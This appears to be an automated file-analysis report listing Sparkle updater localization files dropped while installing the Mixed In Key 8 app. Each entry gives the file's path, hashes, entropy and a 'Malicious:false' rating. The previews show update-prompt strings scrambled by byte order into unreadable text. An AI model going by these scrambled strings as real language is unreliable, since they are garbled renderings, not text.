                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " ....% $1 @2%@$. ...... .............. .... ............ .......... .......... ........!.. .. .............. .. ...... ........................ ........ .. .............................. .. .1%@$. ......;.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " ....% $1 @....... .......... ...... .................. ........ .......... ........ ...... ............ ................-.......... .......... .......... ........... ...................... .. .1%@$. ...... .............. ................ ....... ,........................... .. ........ ......,.. .... ..........................."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =.".. .1%@$% $2 @........... .................... ................ ............."..;".@%% @sin woa avlibael
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_lqgdUf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4132
                                                                                                    Entropy (8bit):4.792047857345539
                                                                                                    Encrypted:false
                                                                                                    MD5:2CC426B92381ABE3E2E44E43FB6D2655
                                                                                                    SHA1:EDA564CFCE0C270EAB65ABA0E23A6CEF28A33789
                                                                                                    SHA-256:11443A9A18E0DA638B61A4EDA53A87BEF3B4900662432B4663406CF7932DB207
                                                                                                    SHA-512:AF170445DEDA1EC65DAD7F37AC35789E1F236E8C520DF72422CE56F84687D09A82DAEC5C222ADF58503362B2075B7DA7E1314FFBB9BCFE92C6CCF22B9707450F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$c na..t.b epuadet dhwnei .t.. surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb-ey-uo
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_ob1IZY
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3568
                                                                                                    Entropy (8bit):4.881888869875779
                                                                                                    Encrypted:false
                                                                                                    MD5:904BBB71B712CEDEF3897E39A6E2BE8E
                                                                                                    SHA1:8E5118B8BAE7CF21F81BBE34581C4BBA7587EFF3
                                                                                                    SHA-256:F89FCD9201741E9BC02500BD4D61116EE20D94004A240EFB8A346370825F14E0
                                                                                                    SHA-512:AC861D30DFF280025A9B4DC8D07A6CBDC8977D22EE44F61591504A291F12C15B230C1827C3CFE6B20CB07699904A27193C4242EFF5A9B80958CB82A212C35DA7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @esh nad seacgrda o yse.tn.l siot saparu itilaz.r. L. eugtsra.. anitslarae i inicra% $1 @haro?a;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n oesp eueda tcauilaz rucnaods ejecetu aedds enuv lomuned e.sl. oeltcru aocomi ameg nedd sioco m deoi. p.itoc .uMve a1%@$a s uacprte aedA lpcicaoien s yrtta eedi inicraold seeda ll.."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e sal. l.itamv reis.. nidpsnobiel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsnobiel( suet ditne eal% $3)@ ...eDes aedcsraaglr aharo?a;"..%" @odnwoldade " =%" @edcsraagod;"..%" @fo% "@= " 1%@$d e2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."H.yau ann euavv reis.. ned% .@!.;"..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_HSeika
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2500
                                                                                                    Entropy (8bit):4.8752165718531755
                                                                                                    Encrypted:false
                                                                                                    MD5:8A8DB0FF1F7E062F789594FC566C8000
                                                                                                    SHA1:19921C6F3E817D4C31A5C23E9C3D3D39D7E82CEF
                                                                                                    SHA-256:1DD3B764E2F93C0238541D0C748359CBB5E88B3CAB708CBE6269FA5D5073697E
                                                                                                    SHA-512:0DFC6DE43FA9B23BB34F710E9B0ADA5613F2C306D0863A2B9F249AEA9E8170BC88C11578C7B713D481767F46B24FB29175A0B458E18BD731675A28138DBE596B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$/ % $2"@.;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%"$1 @2%@$o nsaneentt uajo navmliiank ..ty.t..n.s uearvanak rear nuk n3%@$k ..nyintste....!nH laaukt o.ky.nnsi.t.. .hoejmlnau duleelne"?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$o nuuis nastavalialo elavv reis.o;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @non tys aaativll as(nilualo n3%@$.)H laaukt oaladats nen ty"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =K"..ty.tj...ll..% @ieo elo kiueskaio jhleam naksnoino !jAtaoko jhleam aelyvitdesootts?aJ soe ,tk sy ypaauj ..jrseetml.. nly.lp.ti...jl..t..;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =U"su ievsroio jhleamts a@%o nsaneentt!u;"..A"n wev reisnoo f@%i svaiaallb!e " =U"su ievsroio jhleamts a% @nos aaativll!a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_8tvzcu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3714
                                                                                                    Entropy (8bit):4.888751024111058
                                                                                                    Encrypted:false
                                                                                                    MD5:225C9BA3FFB0766A5AC5D371BB6B15FF
                                                                                                    SHA1:AD66D63630381BAC884BD90361B0DA0C37E4E073
                                                                                                    SHA-256:78FDC8F099DB63A427C3143BC2E5967C054BE0A460596CB265DB9010E9F0CC65
                                                                                                    SHA-512:39F98DA8AB95F8B605DF0945A2A276D66F74F8F11920DB71A37C8587B5BC7CD53EC90A15FA573FF34F9347D3B9AB9BF008D29BCEA9A07CBBF0F72BFCBAE710C9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ a...t ..tl...hcra.g..V uoel-zovsul ..i.snatllree teralcnre% $1 @amnietantn.."?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @enp ue tap s..rt eim s..j uo ruqna dlif notcoinn e..p rait r.d..nuv lomu enel ceuters ueel ,ocmm enu emiga eidqseuo unul ceetruo tpqieu ..Dp.alec z1%@$d na sovrt eodssei rpAlpcitaoisn ,eralcnzel- e..p rait redl ..e t.re.ssyaze"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e tsl aevsroi nalp ul s.rc.neetd siopinlb.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e tsd siopinlb.e;.v uo stulisizel aevsroi n3%@$ .oVluzev-uo selt ...lc.ahgrrem iatnnena.t?.;"..%" @odnwoldade " =%" @.tl...hcra.g"..;".@%o f@% " =%"$1 @us r2%@$;"..A"n wev re
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_QRKIQS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2604
                                                                                                    Entropy (8bit):5.008724955056715
                                                                                                    Encrypted:false
                                                                                                    MD5:3270BA6D293CD90010791C5FF09BFD8F
                                                                                                    SHA1:678084F1C133B194FF3F2C23F05D9B84D1B31E95
                                                                                                    SHA-256:47E5E47BCDB90558D6CE23284BC7E9F7950ADBA18F0C465190BC62047F36A14B
                                                                                                    SHA-512:BE9F91D4CA8FCCE76805C074FF94BB5C143866B7B2DADEFA309235A64B1579AC688E5D02CC5E5854AF3F9EE6B9E0468B4A154EE453E636390DD3A82080884CFB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @............. ........ ............ .......... .......... ...... ............ .. .3%@$! . .......... ..........."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .... ............ .......... ............."..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ...... .......( ..... .. .3%@$.). .......... .............. ....?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " ..% @....... ........ ............ .......... ................. !....... .... .......... -.d si cmiga?e. .. ..... ,....... ...... ............ ........;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =."...... .......... .. .@%. ..........!.;"..A"n wev reisnoo f@%i svaiaallb!e " =."...... .......... .. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_redHxP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2424
                                                                                                    Entropy (8bit):4.717127628221706
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3EA6E0077DA6182BBE7CC2FFCA1236
                                                                                                    SHA1:28DF08B4E8E111F7F02CA03F3157E2372A80C720
                                                                                                    SHA-256:2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
                                                                                                    SHA-512:5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_k078C3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2424
                                                                                                    Entropy (8bit):4.717127628221706
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3EA6E0077DA6182BBE7CC2FFCA1236
                                                                                                    SHA1:28DF08B4E8E111F7F02CA03F3157E2372A80C720
                                                                                                    SHA-256:2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
                                                                                                    SHA-512:5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_XJHggp
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2486
                                                                                                    Entropy (8bit):4.941691582568595
                                                                                                    Encrypted:false
                                                                                                    MD5:658C922C387DE9085433993836674519
                                                                                                    SHA1:CD1BD898E900C35295BA365441EAE812987A92D1
                                                                                                    SHA-256:7BA6A77B194445F35D135E3C361BED3BA394D8AEBC9950F3E9FB32700177E141
                                                                                                    SHA-512:C6989CAEBFC7EBEF557126A1CFAD44B4CBFFD87A32186AA0DE2A33214F3D20034716E3FFCE4AA2104B32E50D5D9C739CF0521CF5D66D1651E54C8B383A17D29E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " @%a f@%;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " @%% @ehuf revir..s te tni ngov re..rut li.tk. tiv..n ..ts u.rs.niug% .@V liute dnru.rs. a.nn.?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @ren ..ajts a..gt..af nes mref ..nael g..seass utdnni.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."t.agaf% $2 @fa% $1 @ren ..f ..naeltge n....e trm .e .3%@$ .iVtl u.sk.ajh na a.nn.?a;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h ferue kk iehmili dit l.a .ksiraf. ..mp.upf roirstni!sE tr u.a .ekry aofrrti.i .fad simkny?dE fkeiks aktl u.r..f...ar. i. giv..k reifssjt..arnn"..;". Aen wevsroi nfo% @ah sebnei snatllde"!= " .N ...gt..afa f@%h feruv re.i .estti nn"!.;". Aen wevsroi nfo% @sia avlibael"!= " .N ...gt..afa f@%e r.fa.lnge"!.;".nAe rr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_Ux5MrL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3646
                                                                                                    Entropy (8bit):4.843902978796583
                                                                                                    Encrypted:false
                                                                                                    MD5:C61AEA0FF202980A419D3EAC48D869A3
                                                                                                    SHA1:46FBDD60C2BD71A907CC52B0800486485C68DE69
                                                                                                    SHA-256:D85F1741E25D66D2A3C156BFE983F2AAB4390BD4580E67F502C7DD672EBE59DD
                                                                                                    SHA-512:4CDEE53C104BF1541D663E62FD0E2D1745B45941CF5DE9536A56674649B0649C964FE0ECC2BF5D6B82EDFC5709107D9123207CF3E2F58279A172994B0C51C766
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @..s atots aciracote d..p ortn oep rseeseru itilzzta!oD sedire initslaalere r aivvaier 1%@$o ar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =I"pmsoisibela ggoinrra e1%@$q audn oivne esegeiuotd anuv lomu eids lo aelttru aocemu .n..miamigend sioco u .n..nuti..o ttci.aS optsra e1%@$n lealC raetll apAlpcizaoiin ,irvaivraole r pioraver"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .alv reisno eip..r ceneeta ttaumlneetd siopinibel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @..d siopbnli;ed siopind lealv reisno e3%@$ .eDisedire esugri e.l..gaigroanemtn oro?a;"..%" @odnwoldade " =%" @csracita"o.;".@%o f@% " =%"$1 @id% $2"@.;". Aen wevsroi nfo% @sia avlibael"!=
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_M62Uxz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4122
                                                                                                    Entropy (8bit):5.670129832466164
                                                                                                    Encrypted:false
                                                                                                    MD5:4DD8CB383D73BC835678A965208A162A
                                                                                                    SHA1:AFEA320D4120BD2D3D140C8F4E34F50DF9772718
                                                                                                    SHA-256:A4819EC90F564A71EC906005921C8EDC090EDAAF19990E706FF49C4B24FCDCFC
                                                                                                    SHA-512:FACE8F4CD789A77A8AD9DFD1F731BA2AE1F2DE30912058E992D2A7F60575B6FB2C95C6E3777B7A10F3D42A803BDA4A718304D1D8E4811BC823EC93CB47F7293B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @................................................% $1 @..........................................................................?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ......................................................................................................................................................................%.$1 @..................................................................................................................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @......................................................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. .................................................... .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_PYxk3z
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3490
                                                                                                    Entropy (8bit):5.7492033708150565
                                                                                                    Encrypted:false
                                                                                                    MD5:2F74C221BEE30ECE6DE6B251A24091B9
                                                                                                    SHA1:A6D2E8B3B09BAE5D320E4B181A7CC1902FF7CF5B
                                                                                                    SHA-256:73D6AF660F2E59D43B1D0DE2AA0CA3E6F11E0044F3A1E29AB16FFBC3C1E312CA
                                                                                                    SHA-512:FA2CE6B9F798A4F48D5E4CEE0033F303592756A246F58EACA350757ABBF8A8A4D7E673357A671144DBF5D4740653421DB94BFCFB945B4F2F9652BD44A78847AE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2.@...(.. )............. .............. ............... .................... ......... ................?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$..(...).. ......... .......... .DC. .......... ........ .... ........ .......... .............. .......... .............. ... ... ............% $1.@...(.. )................... ......... .......... ........ ......... ............;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2.@...(.. )....... .... .................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$..(...).. .......... .................( ....... .... . :3%@$ )............. ................?.;"..%" @odnwoldade " =%" @............. ...."..;".@%o f@% " =%"$1
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_wmLgko
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3926
                                                                                                    Entropy (8bit):4.792603716238071
                                                                                                    Encrypted:false
                                                                                                    MD5:BC7B6D1A52851036451241DB1D63DF03
                                                                                                    SHA1:76BCE213F254401292F8432A6A2A59A646065359
                                                                                                    SHA-256:5BEF32AC7ED813273760E05384DD5C38B8D874BD0EF801BCDBC8359D280A2E75
                                                                                                    SHA-512:94F5E27807E65A977E621C62A32DE44FD55EB9F48ABDD413F9D61B1BC1009C17D013E1E7CB415D1D1CC77E54CEDE212024E5509C558CA66E369DB70B253BC51F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @sig dewolnao dnei slkaa rovrog beurki !iWtlu % $1 @uni snatllrenee nehsrattrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nintew roed negpuadeta slh tev nae nea llee-nelez novulem ,ozla see ncsihfjokip efoC ,Dg oeepdni .sV relpaast% $1 @anrad eaM p..P.orrgmaam..s...,.h retsra tav nadra ,nep orebreo npeiwu"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$i somemtnee ledr cenestetv reis.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$i sunb sehckiabra..u.h eetf% $3.@W li t ueh tund wolnaoed?n;"..%" @odnwoldade " =%" @egodnwolda;"..%" @fo% "@= " 1%@$v na% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " eE ninueewv reis eav n@%i sebcsihbkaa!r;"..A"n wev re
